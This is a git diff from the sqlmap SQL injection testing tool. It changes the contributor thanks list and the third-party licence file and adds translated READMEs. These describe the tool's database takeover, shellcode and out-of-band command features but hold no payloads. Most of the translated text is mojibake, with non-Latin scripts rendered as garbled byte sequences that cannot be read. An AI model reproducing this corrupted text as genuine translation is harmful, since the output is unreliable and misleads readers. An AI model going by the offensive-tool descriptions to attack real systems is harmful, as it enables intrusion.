porting chardet package (Universal Encoding Detector) to Python -Steve Pinkham, +Steve Pinkham, * for suggesting a feature * for contributing a new SQL injection vector (MSSQL time-based blind) * for donating to sqlmap development -Adam Pridgen, +Adam Pridgen, * for suggesting some features -Luka Pusic, +Luka Pusic, * for reporting a couple of bugs -Ole Rasmussen, +Ole Rasmussen, * for reporting a bug * for suggesting a feature -Alberto Revelli, -* for inspiring me to write sqlmap user's manual in SGML +Alberto Revelli, +* for inspiring to write sqlmap user's manual in SGML * for his great Microsoft SQL Server take over tool, sqlninja, http://sqlninja.sourceforge.net -David Rhoades, +David Rhoades, * for reporting a bug -Andres Riancho, +Andres Riancho, * for beta-testing sqlmap * for reporting a bug and suggesting some features * for including sqlmap in his great web application audit and attack framework, w3af, http://w3af.sourceforge.net * for suggesting a way for handling DNS caching -Jamie Riden, +Jamie Riden, * for reporting a minor bug -Alexander Rigbo, +Alexander Rigbo, * for contributing a minor patch -Antonio Riva, +Antonio Riva, * for reporting a bug when running with python 2.5 -Ethan Robish, +Ethan Robish, * for reporting a bug -Levente Rog, +Levente Rog, * for reporting a minor bug -Andrea Rossi, +Andrea Rossi, * for reporting a minor bug * for suggesting a feature -Frederic Roy, +Frederic Roy, * for reporting a couple of bugs -Vladimir Rutsky, +Vladimir Rutsky, * for suggesting a couple of minor enhancements -Richard Safran, +Richard Safran, * for donating the sqlmap.org domain -Tomoyuki Sakurai, +Tomoyuki Sakurai, * for submitting to the FreeBSD project the sqlmap 0.5 port -Roberto Salgado, +Roberto Salgado, * for contributing considerable amount of tamper scripts -Pedro Jacques Santos Santiago, +Pedro Jacques Santos Santiago, * for reporting considerable amount of bugs -Marek Sarvas, +Marek Sarvas, * for reporting several bugs -Philippe A. R. Schaeffer, +Philippe A. R. Schaeffer, * for reporting a minor bug -Mohd Zamiri Sanin, +Henri Salo +* for a donation + +Mohd Zamiri Sanin, * for reporting a minor bug -Jorge Santos, +Jorge Santos, * for reporting a minor bug -Sven Schluter, +Sven Schluter, * for contributing a patch * for waiting a number of seconds between each HTTP request -Ryan Sears, +Ryan Sears, * for suggesting a couple of enhancements * for donating to sqlmap development -Uemit Seren, +Uemit Seren, * for reporting a minor adjustment when running with python 2.6 -Shane Sewell, +Shane Sewell, * for suggesting a feature -Ahmed Shawky, +Ahmed Shawky, * for reporting a major bug with improper handling of parameter values * for reporting a bug -Brian Shura, +Brian Shura, * for reporting a bug -Sumit Siddharth, +Sumit Siddharth, * for sharing ideas on the implementation of a couple of features -Andre Silva, +Andre Silva, * for reporting a bug -Benjamin Silva H. +Benjamin Silva H. * for reporting a bug -Duarte Silva +Duarte Silva * for reporting a couple of bugs -M Simkin, +M Simkin, * for suggesting a feature -Konrads Smelkovs, +Tanaydin Sirin, +* for implementation of ncurses TUI (switch --tui) + +Konrads Smelkovs, * for reporting a few bugs in --sql-shell and --sql-query on Microsoft SQL Server -Chris Spencer, +Chris Spencer, * for reviewing the user's manual grammar -Michael D. Stenner, +Michael D. Stenner, * for his keepalive module that allows handling of persistent HTTP 1.1 keep-alive connections -Marek Stiefenhofer, +Marek Stiefenhofer, * for reporting a few bugs -Jason Swan, +Jason Swan, * for reporting a bug when enumerating columns on Microsoft SQL Server * for suggesting a couple of improvements -Chilik Tamir, +Chilik Tamir, * for contributing a patch for initial support SOAP requests -Alessandro Tanasi, +Alessandro Tanasi, * for extensively beta-testing sqlmap * for suggesting many features and reporting some bugs * for reviewing the documentation -Andres Tarasco, +Andres Tarasco, * for contributing good feedback -Tom Thumb, +Tom Thumb, * for reporting a major bug -Kazim Bugra Tombul, +Kazim Bugra Tombul, * for reporting a minor bug -Efrain Torres, -* for helping me out to improve the Metasploit Framework sqlmap auxiliary module and for commiting it on the Metasploit official subversion repository +Efrain Torres, +* for helping out to improve the Metasploit Framework sqlmap auxiliary module and for committing it on the Metasploit official subversion repository * for his great Metasploit WMAP Framework -Sandro Tosi, +Jennifer Torres, +* for contributing a tamper script luanginx.py + +Sandro Tosi, * for helping to create sqlmap Debian package correctly -Jacco van Tuijl, +Jacco van Tuijl, * for reporting several bugs -Vitaly Turenko, +Vitaly Turenko, * for reporting a bug -Augusto Urbieta, +Augusto Urbieta, * for reporting a minor bug -Bedirhan Urgun, +Bedirhan Urgun, * for reporting a few bugs * for suggesting some features and improvements * for benchmarking sqlmap in the context of his SQL injection benchmark project, OWASP SQLiBench, http://code.google.com/p/sqlibench -Kyprianos Vasilopoulos, +Kyprianos Vasilopoulos, * for reporting a couple of minor bugs -Vlado Velichkovski, +Vlado Velichkovski, * for reporting considerable amount of bugs * for suggesting an enhancement -Johnny Venter, +Johnny Venter, * for reporting a couple of bugs -Carlos Gabriel Vergara, +Carlos Gabriel Vergara, * for suggesting couple of good features -Patrick Webster, +Patrick Webster, * for suggesting an enhancement +* for donating to sqlmap development (from OSI.Security) -Ed Williams, +Ed Williams, * for suggesting a minor enhancement -Anthony Zboralski, +Anthony Zboralski, * for providing with detailed feedback * for reporting a few minor bugs * for donating to sqlmap development -Thierry Zoller, +Thierry Zoller, * for reporting a couple of major bugs -Zhen Zhou, +Zhen Zhou, * for suggesting a feature --insane-, +-insane-, * for reporting a minor bug -1ndr4 joe, +1ndr4 joe, * for reporting a couple of bugs -abc abc, +abc abc, * for reporting a minor bug -Abuse 007, +Abuse 007, * for reporting a bug -Alex, +agix, +* for contributing the file upload via certutil.exe functionality + +Alex, * for reporting a minor bug -anonymous anonymous, +anonymous anonymous, * for reporting a couple of bugs -bamboo, +bamboo, * for reporting a couple of bugs -Brandon E., +Brandon E., * for reporting a bug -black zero, +black zero, * for reporting a minor bug -blueBoy, +blueBoy, * for reporting a bug -buawig, +buawig, * for reporting considerable amount of bugs -Bugtrace, +Bugtrace, * for reporting several bugs -cats, +cats, * for reporting a couple of bugs -Christian S, +Christian S, * for reporting a minor bug -clav, +clav, * for reporting a minor bug -dragoun dash, +dragoun dash, * for reporting a minor bug -fufuh, +flsf, +* for contributing WAF scripts 360.py, anquanbao.py, baidu.py, safedog.py +* for contributing a minor patch + +fufuh, * for reporting a bug when running on Windows -Hans Wurst, +Hans Wurst, * for reporting a couple of bugs -james, +Hysia, +* for contributing a Chinese translation of README.md + +james, * for reporting a bug -Joe "Pragmatk", +Joe "Pragmatk", * for reporting a few bugs -John Smith, +John Smith, * for reporting several bugs * for suggesting some features -m4l1c3, +m4l1c3, * for reporting considerable amount of bugs -mariano, +mariano, * for reporting a bug -mitchell, +mitchell, * for reporting a few bugs -Nadzree, +Nadzree, * for reporting a minor bug -nightman, +nightman, * for reporting considerable amount of bugs -Oso Dog osodog123@yahoo.com +Oso Dog osodog123(at)yahoo.com * for reporting a minor bug -pacman730, +pacman730, * for reporting a bug -pentestmonkey, +pentestmonkey, * for reporting several bugs * for suggesting a few minor enhancements -Phat R., +Phat R., * for reporting a few bugs -Phil P, <@superevr> +Phil P, <(at)superevr> * for suggesting a minor enhancement -ragos, +ragos, * for reporting a minor bug -rmillet, +rmillet, * for reporting a bug -Rub3nCT, +Rub3nCT, * for reporting a minor bug -shiftzwei, +sapra, +* for helping out with Python multiprocessing library on MacOS + +shiftzwei, * for reporting a couple of bugs -smith, +smith, * for reporting a minor bug -Soma Cruz, +Soma Cruz, * for reporting a minor bug -Stuffe, +Spiros94, +* for contributing a Greek translation of README.md + +Stuffe, * for reporting a minor bug and a feature request -Sylphid, +Sylphid, * for suggesting some features -syssecurity.info, +syssecurity.info, * for reporting a minor bug -This LittlePiggy, +This LittlePiggy, * for reporting a minor bug -ToR, +ToR, * for reporting considerable amount of bugs * for suggesting a feature -ultramegaman, +ultramegaman, * for reporting a minor bug -Vinicius, +Vinicius, * for reporting a minor bug -wanglei, +virusdefender +* for contributing WAF scripts safeline.py + +w8ay +* for contributing an implementation for chunked transfer-encoding (switch --chunked) + +wanglei, * for reporting a minor bug -warninggp, +warninggp, * for reporting a few minor bugs -x, +x, * for reporting a bug -zhouhx, +zhouhx, * for contributing a minor patch # Organizations -Black Hat team, +Black Hat team, * for the opportunity to present my research titled 'Advanced SQL injection to operating system full control' at Black Hat Europe 2009 Briefings on April 16, 2009 in Amsterdam (NL). I unveiled and demonstrated some of the sqlmap 0.7 release candidate version new features during my presentation * Homepage: http://goo.gl/BKfs7 * Slides: http://goo.gl/Dh65t * White paper: http://goo.gl/spX3N -SOURCE Conference team, +SOURCE Conference team, * for the opportunity to present my research titled 'Expanding the control over the operating system from the database' at SOURCE Conference 2009 on September 21, 2009 in Barcelona (ES). I unveiled and demonstrated some of the sqlmap 0.8 release candidate version new features during my presentation * Homepage: http://goo.gl/IeXV4 * Slides: http://goo.gl/OKnfj -AthCon Conference team, +AthCon Conference team, * for the opportunity to present my research titled 'Got database access? Own the network!' at AthCon Conference 2010 on June 3, 2010 in Athens (GR). I unveiled and demonstrated some of the sqlmap 0.8 version features during my presentation * Homepage: http://goo.gl/Fs71I * Slides: http://goo.gl/QMfjO -Metasploit Framework development team, +Metasploit Framework development team, * for their powerful tool Metasploit Framework, used by sqlmap, among others things, to create the shellcode and establish an out-of-band connection between sqlmap and the database server * Homepage: http://www.metasploit.com -OWASP Board, +OWASP Board, * for sponsoring part of the sqlmap development in the context of OWASP Spring of Code 2007 * Homepage: http://www.owasp.org diff --git a/doc/THIRD-PARTY.md b/doc/THIRD-PARTY.md index 379e752f805..03c0c01e8f4 100644 --- a/doc/THIRD-PARTY.md +++ b/doc/THIRD-PARTY.md @@ -2,25 +2,20 @@ This file lists bundled packages and their associated licensing terms. # BSD -* The Ansistrm library located under thirdparty/ansistrm/. +* The `Ansistrm` library located under `thirdparty/ansistrm/`. Copyright (C) 2010-2012, Vinay Sajip. -* The Beautiful Soup library located under thirdparty/beautifulsoup/. +* The `Beautiful Soup` library located under `thirdparty/beautifulsoup/`. Copyright (C) 2004-2010, Leonard Richardson. -* The ClientForm library located under thirdparty/clientform/. +* The `ClientForm` library located under `thirdparty/clientform/`. Copyright (C) 2002-2007, John J. Lee. Copyright (C) 2005, Gary Poster. Copyright (C) 2005, Zope Corporation. Copyright (C) 1998-2000, Gisle Aas. -* The Colorama library located under thirdparty/colorama/. - Copyright (C) 2010, Jonathan Hartley. -* The Fcrypt library located under thirdparty/fcrypt/. +* The `Colorama` library located under `thirdparty/colorama/`. + Copyright (C) 2013, Jonathan Hartley. +* The `Fcrypt` library located under `thirdparty/fcrypt/`. Copyright (C) 2000, 2001, 2004 Carey Evans. -* The Odict library located under thirdparty/odict/. - Copyright (C) 2005, Nicola Larosa, Michael Foord. -* The Oset library located under thirdparty/oset/. - Copyright (C) 2010, BlueDynamics Alliance, Austria. - Copyright (C) 2009, Raymond Hettinger, and others. -* The SocksiPy library located under thirdparty/socks/. +* The `SocksiPy` library located under `thirdparty/socks/`. Copyright (C) 2006, Dan-Haim. ```` @@ -49,17 +44,13 @@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # LGPL -* The Chardet library located under thirdparty/chardet/. +* The `Chardet` library located under `thirdparty/chardet/`. Copyright (C) 2008, Mark Pilgrim. -* The Gprof2dot library located under thirdparty/gprof2dot/. - Copyright (C) 2008-2009, Jose Fonseca. -* The KeepAlive library located under thirdparty/keepalive/. +* The `KeepAlive` library located under `thirdparty/keepalive/`. Copyright (C) 2002-2003, Michael D. Stenner. -* The MultipartPost library located under thirdparty/multipartpost/. +* The `MultipartPost` library located under `thirdparty/multipart/`. Copyright (C) 2006, Will Holcomb. -* The XDot library located under thirdparty/xdot/. - Copyright (C) 2008, Jose Fonseca. -* The icmpsh tool located under extra/icmpsh/. +* The `icmpsh` tool located under `extra/icmpsh/`. Copyright (C) 2010, Nico Leidecker, Bernardo Damele. ```` @@ -232,7 +223,7 @@ Library. # PSF -* The Magic library located under thirdparty/magic/. +* The `Magic` library located under `thirdparty/magic/`. Copyright (C) 2011, Adam Hupp. ```` @@ -277,13 +268,15 @@ be bound by the terms and conditions of this License Agreement. # MIT -* The bottle web framework library located under extra/bottle/. - Copyright (C) 2012, Marcel Hellkamp. -* The PageRank library located under thirdparty/pagerank/. - Copyright (C) 2010, Corey Goldberg. -* The PrettyPrint library located under thirdparty/prettyprint/. - Copyright (C) 2010, Chris Hall. -* The Termcolor library located under thirdparty/termcolor/. +* The `bottle` web framework library located under `thirdparty/bottle/`. + Copyright (C) 2024, Marcel Hellkamp. +* The `identYwaf` library located under `thirdparty/identywaf/`. + Copyright (C) 2019-2021, Miroslav Stampar. +* The `ordereddict` library located under `thirdparty/odict/`. + Copyright (C) 2009, Raymond Hettinger. +* The `six` Python 2 and 3 compatibility library located under `thirdparty/six/`. + Copyright (C) 2010-2024, Benjamin Peterson. +* The `Termcolor` library located under `thirdparty/termcolor/`. Copyright (C) 2008-2011, Volvox Development Team. ```` @@ -310,5 +303,7 @@ WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # Public domain -* The PyDes library located under thirdparty/pydes/. +* The `PyDes` library located under `thirdparty/pydes/`. Copyleft 2009, Todd Whiteman. +* The `win_inet_pton` library located under `thirdparty/wininetpton/`. + Copyleft 2014, Ryan Vennell. diff --git a/doc/translations/README-ar-AR.md b/doc/translations/README-ar-AR.md new file mode 100644 index 00000000000..29d8e9f15b0 --- /dev/null +++ b/doc/translations/README-ar-AR.md @@ -0,0 +1,68 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![X](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +
+ +برنامج sqlmap هو أداة اختبار اختراق Ù…ÙØªÙˆØ­Ø© المصدر تقوم بأتمتة عملية اكتشا٠واستغلال ثغرات حقن SQL والسيطرة على خوادم قواعد البيانات. يأتي مع محرك كش٠قوي، والعديد من الميزات المتخصصة لمختبر الاختراق Ø§Ù„Ù…Ø­ØªØ±ÙØŒ ومجموعة واسعة من الخيارات بما ÙÙŠ ذلك تحديد بصمة قاعدة البيانات، واستخراج البيانات من قاعدة البيانات، والوصول إلى نظام Ø§Ù„Ù…Ù„ÙØ§Øª الأساسي، وتنÙيذ الأوامر على نظام التشغيل عبر اتصالات خارج النطاق. + +لقطات الشاشة +---- + +
+ +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +
+ +يمكنك زيارة [مجموعة لقطات الشاشة](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) التي توضح بعض الميزات ÙÙŠ الويكي. + +التثبيت +---- + +يمكنك تحميل أحدث إصدار tarball بالنقر [هنا](https://github.com/sqlmapproject/sqlmap/tarball/master) أو أحدث إصدار zipball بالنقر [هنا](https://github.com/sqlmapproject/sqlmap/zipball/master). + +ÙŠÙØ¶Ù„ تحميل sqlmap عن طريق استنساخ مستودع [Git](https://github.com/sqlmapproject/sqlmap): + +
+ + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +
+ +يعمل sqlmap مباشرة مع [Python](https://www.python.org/download/) إصدار **2.6** Ùˆ **2.7** Ùˆ **3.x** على أي نظام تشغيل. + +الاستخدام +---- + +للحصول على قائمة بالخيارات ÙˆØ§Ù„Ù…ÙØ§ØªÙŠØ­ الأساسية استخدم: + +
+ + python sqlmap.py -h + +
+ +للحصول على قائمة بجميع الخيارات ÙˆØ§Ù„Ù…ÙØ§ØªÙŠØ­ استخدم: + +
+ + python sqlmap.py -hh + +
+ +يمكنك العثور على مثال للتشغيل [هنا](https://asciinema.org/a/46601). +للحصول على نظرة عامة على إمكانيات sqlmapØŒ وقائمة الميزات المدعومة، ووص٠لجميع الخيارات ÙˆØ§Ù„Ù…ÙØ§ØªÙŠØ­ØŒ مع الأمثلة، ننصحك بمراجعة [دليل المستخدم](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +الروابط +---- + +* Ø§Ù„ØµÙØ­Ø© الرئيسية: https://sqlmap.org +* التحميل: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) أو [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* تغذية التحديثات RSS: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* تتبع المشكلات: https://github.com/sqlmapproject/sqlmap/issues +* دليل المستخدم: https://github.com/sqlmapproject/sqlmap/wiki +* الأسئلة الشائعة: https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* تويتر: [@sqlmap](https://x.com/sqlmap) +* العروض التوضيحية: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* لقطات الشاشة: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots \ No newline at end of file diff --git a/doc/translations/README-bg-BG.md b/doc/translations/README-bg-BG.md new file mode 100644 index 00000000000..d66b5301e11 --- /dev/null +++ b/doc/translations/README-bg-BG.md @@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap e инÑтрумент за теÑтване и проникване, Ñ Ð¾Ñ‚Ð²Ð¾Ñ€ÐµÐ½ код, който автоматизира процеÑа на откриване и използване на недоÑтатъците на SQL база данните чрез SQL инжекциÑ, коÑто ги взима от Ñървъра. Снабден е Ñ Ð¼Ð¾Ñ‰ÐµÐ½ детектор, множеÑтво Ñпециални функции за най-Ð´Ð¾Ð±Ñ€Ð¸Ñ Ñ‚ÐµÑтер и широк Ñпектър от функции, които могат да Ñе използват за множеÑтво цели - извличане на данни от базата данни, доÑтъп до оÑновната файлова ÑиÑтема и изпълнÑване на команди на операционната ÑиÑтема. + +Демо Ñнимки +---- + +![Снимка на екрана](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Можете да поÑетите [колекциÑта от Ñнимки на екрана](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), показващи нÑкои функции, качени на wiki. + +ИнÑталиране +---- + +Може да изтеглине най-новите tar архиви като кликнете [тук](https://github.com/sqlmapproject/sqlmap/tarball/master) или най-новите zip архиви като кликнете [тук](https://github.com/sqlmapproject/sqlmap/zipball/master). + +За предпочитане е да изтеглите sqlmap като клонирате [Git](https://github.com/sqlmapproject/sqlmap) хранилището: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap работи ÑамоÑтоÑтелно Ñ [Python](https://www.python.org/download/) верÑÐ¸Ñ **2.7** и **3.x** на вÑички платформи. + +Използване +---- + +За да получите ÑпиÑък Ñ Ð¾Ñновните опции използвайте: + + python sqlmap.py -h + +За да получите ÑпиÑък Ñ Ð²Ñички опции използвайте: + + python sqlmap.py -hh + +Може да намерите пример за използване на sqlmap [тук](https://asciinema.org/a/46601). +За да разберете възможноÑтите на sqlmap, ÑпиÑък на поддържаните функции и опиÑание на вÑички опции, заедно Ñ Ð¿Ñ€Ð¸Ð¼ÐµÑ€Ð¸, Ñе препоръчва да Ñе разгледа [упътването](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Връзки +---- + +* Ðачална Ñтраница: https://sqlmap.org +* ИзтеглÑне: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS емиÑиÑ: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* ПроÑледÑване на проблеми и въпроÑи: https://github.com/sqlmapproject/sqlmap/issues +* Упътване: https://github.com/sqlmapproject/sqlmap/wiki +* ЧеÑто задавани въпроÑи (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* Демо: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Снимки на екрана: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-bn-BD.md b/doc/translations/README-bn-BD.md new file mode 100644 index 00000000000..8e4cfe36905 --- /dev/null +++ b/doc/translations/README-bn-BD.md @@ -0,0 +1,62 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![X](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +**SQLMap** à¦à¦•টি ওপেন সোরà§à¦¸ পেনিটà§à¦°à§‡à¦¶à¦¨ টেসà§à¦Ÿà¦¿à¦‚ টà§à¦² যা সà§à¦¬à¦¯à¦¼à¦‚কà§à¦°à¦¿à¦¯à¦¼à¦­à¦¾à¦¬à§‡ SQL ইনজেকশন দà§à¦°à§à¦¬à¦²à¦¤à¦¾ সনাকà§à¦¤ ও শোষণ করতে à¦à¦¬à¦‚ ডাটাবেস সারà§à¦­à¦¾à¦° নিয়নà§à¦¤à§à¦°à¦£à§‡ নিতে সহায়তা করে। à¦à¦Ÿà¦¿ à¦à¦•টি শকà§à¦¤à¦¿à¦¶à¦¾à¦²à§€ ডিটেকশন ইঞà§à¦œà¦¿à¦¨, উনà§à¦¨à¦¤ ফিচার à¦à¦¬à¦‚ পেনিটà§à¦°à§‡à¦¶à¦¨ টেসà§à¦Ÿà¦¾à¦°à¦¦à§‡à¦° জনà§à¦¯ দরকারি বিভিনà§à¦¨ অপশন নিয়ে আসে। à¦à¦° মাধà§à¦¯à¦®à§‡ ডাটাবেস ফিঙà§à¦—ারপà§à¦°à¦¿à¦¨à§à¦Ÿà¦¿à¦‚, ডাটাবেস থেকে তথà§à¦¯ আহরণ, ফাইল সিসà§à¦Ÿà§‡à¦® অà§à¦¯à¦¾à¦•à§à¦¸à§‡à¦¸, à¦à¦¬à¦‚ অপারেটিং সিসà§à¦Ÿà§‡à¦®à§‡ কমানà§à¦¡ চালানোর মতো কাজ করা যায়, à¦à¦®à¦¨à¦•ি আউট-অফ-বà§à¦¯à¦¾à¦¨à§à¦¡ সংযোগ বà§à¦¯à¦¬à¦¹à¦¾à¦° করেও। + + + +সà§à¦•à§à¦°à¦¿à¦¨à¦¶à¦Ÿ +--- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +আপনি [Wiki-তে](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) গিয়ে SQLMap-à¦à¦° বিভিনà§à¦¨ ফিচারের ডেমোনসà§à¦Ÿà§à¦°à§‡à¦¶à¦¨ দেখতে পারেন। + +ইনসà§à¦Ÿà¦²à§‡à¦¶à¦¨ +--- +সরà§à¦¬à¦¶à§‡à¦· টারবলে ডাউনলোড করà§à¦¨ [à¦à¦–ানে](https://github.com/sqlmapproject/sqlmap/tarball/master) অথবা সরà§à¦¬à¦¶à§‡à¦· জিপ ফাইল [à¦à¦–ানে](https://github.com/sqlmapproject/sqlmap/zipball/master)। + +অথবা, সরাসরি [Git](https://github.com/sqlmapproject/sqlmap) রিপোজিটরি থেকে কà§à¦²à§‹à¦¨ করà§à¦¨: + +``` +git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev +``` + +SQLMap সà§à¦¬à¦¯à¦¼à¦‚কà§à¦°à¦¿à¦¯à¦¼à¦­à¦¾à¦¬à§‡ [Python](https://www.python.org/download/) **2.7** à¦à¦¬à¦‚ **3.x** সংসà§à¦•রণে যেকোনো পà§à¦²à§à¦¯à¦¾à¦Ÿà¦«à¦°à§à¦®à§‡ কাজ করে। + + + +বà§à¦¯à¦¬à¦¹à¦¾à¦°à§‡à¦° নিরà§à¦¦à§‡à¦¶à¦¿à¦•া +--- + +বেসিক অপশন à¦à¦¬à¦‚ সà§à¦‡à¦šà¦¸à¦®à§‚হ দেখতে বà§à¦¯à¦¬à¦¹à¦¾à¦° করà§à¦¨: + +``` +python sqlmap.py -h +``` + +সমসà§à¦¤ অপশন ও সà§à¦‡à¦šà§‡à¦° তালিকা পেতে বà§à¦¯à¦¬à¦¹à¦¾à¦° করà§à¦¨: + +``` +python sqlmap.py -hh +``` + +আপনি à¦à¦•টি নমà§à¦¨à¦¾ রান দেখতে পারেন [à¦à¦–ানে](https://asciinema.org/a/46601)। +SQLMap-à¦à¦° সমà§à¦ªà§‚রà§à¦£ ফিচার, কà§à¦·à¦®à¦¤à¦¾, à¦à¦¬à¦‚ কনফিগারেশন সমà§à¦ªà¦°à§à¦•ে বিসà§à¦¤à¦¾à¦°à¦¿à¦¤ জানতে [বà§à¦¯à¦¬à¦¹à¦¾à¦°à¦•ারীর মà§à¦¯à¦¾à¦¨à§à¦¯à¦¼à¦¾à¦²](https://github.com/sqlmapproject/sqlmap/wiki/Usage) পড়ার পরামরà§à¦¶ দেওয়া হচà§à¦›à§‡à¥¤ + + + +লিঙà§à¦•সমূহ +--- + +* হোমপেজ: https://sqlmap.org +* ডাউনলোড: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) অথবা [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* কমিটস RSS ফিড: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* ইসà§à¦¯à§ টà§à¦°à§à¦¯à¦¾à¦•ার: https://github.com/sqlmapproject/sqlmap/issues +* বà§à¦¯à¦¬à¦¹à¦¾à¦°à¦•ারীর মà§à¦¯à¦¾à¦¨à§à¦¯à¦¼à¦¾à¦²: https://github.com/sqlmapproject/sqlmap/wiki +* সচরাচর জিজà§à¦žà¦¾à¦¸à¦¿à¦¤ পà§à¦°à¦¶à§à¦¨ (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* X: [@sqlmap](https://x.com/sqlmap) +* ডেমো ভিডিও: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* সà§à¦•à§à¦°à¦¿à¦¨à¦¶à¦Ÿ: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots + diff --git a/doc/translations/README-ckb-KU.md b/doc/translations/README-ckb-KU.md new file mode 100644 index 00000000000..db813955337 --- /dev/null +++ b/doc/translations/README-ckb-KU.md @@ -0,0 +1,67 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + + +
+ + + +بەرنامەی `sqlmap` بەرنامەیەکی تاقیکردنەوەی چوونە ژوورەوەی سەرچاوە کراوەیە Ú©Û• بە شێوەیەکی ئۆتۆماتیکی بنکەدراوە Ú©Û• Ú©ÛŽØ´Û•ÛŒ ئاسایشی SQL Injection یان هەیە دەدۆزێتەوە. ئەم بەرنامەیە بزوێنەرێکی بەهێزی دیاریکردنی تێدایە. هەروەها Ú©Û†Ù…Û•ÚµÛŽÚ© سکریپتی Ø¨Û•Ø±ÙØ±Ø§ÙˆØ§Ù†ÛŒ هەیە Ú©Û• ئاسانکاری دەکات بۆ پیشەییەکانی تاقیکردنەوەی دزەکردن(penetration tester) بۆ کارکردن Ù„Û•Ú¯Û•Úµ بنکەدراوە. Ù„Û• کۆکردنەوەی زانیاری دەربارەی بانکی داتا تا دەستگەیشتن بە داتاکانی سیستەم Ùˆ جێبەجێکردنی Ùەرمانەکان Ù„Û• Ú•ÛŽÚ¯Û•ÛŒ پەیوەندی Out Of Band Ù„Û• سیستەمی کارگێڕدا. + + +سکرین شاتی ئامرازەکە +---- + + +
+ + + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + + +
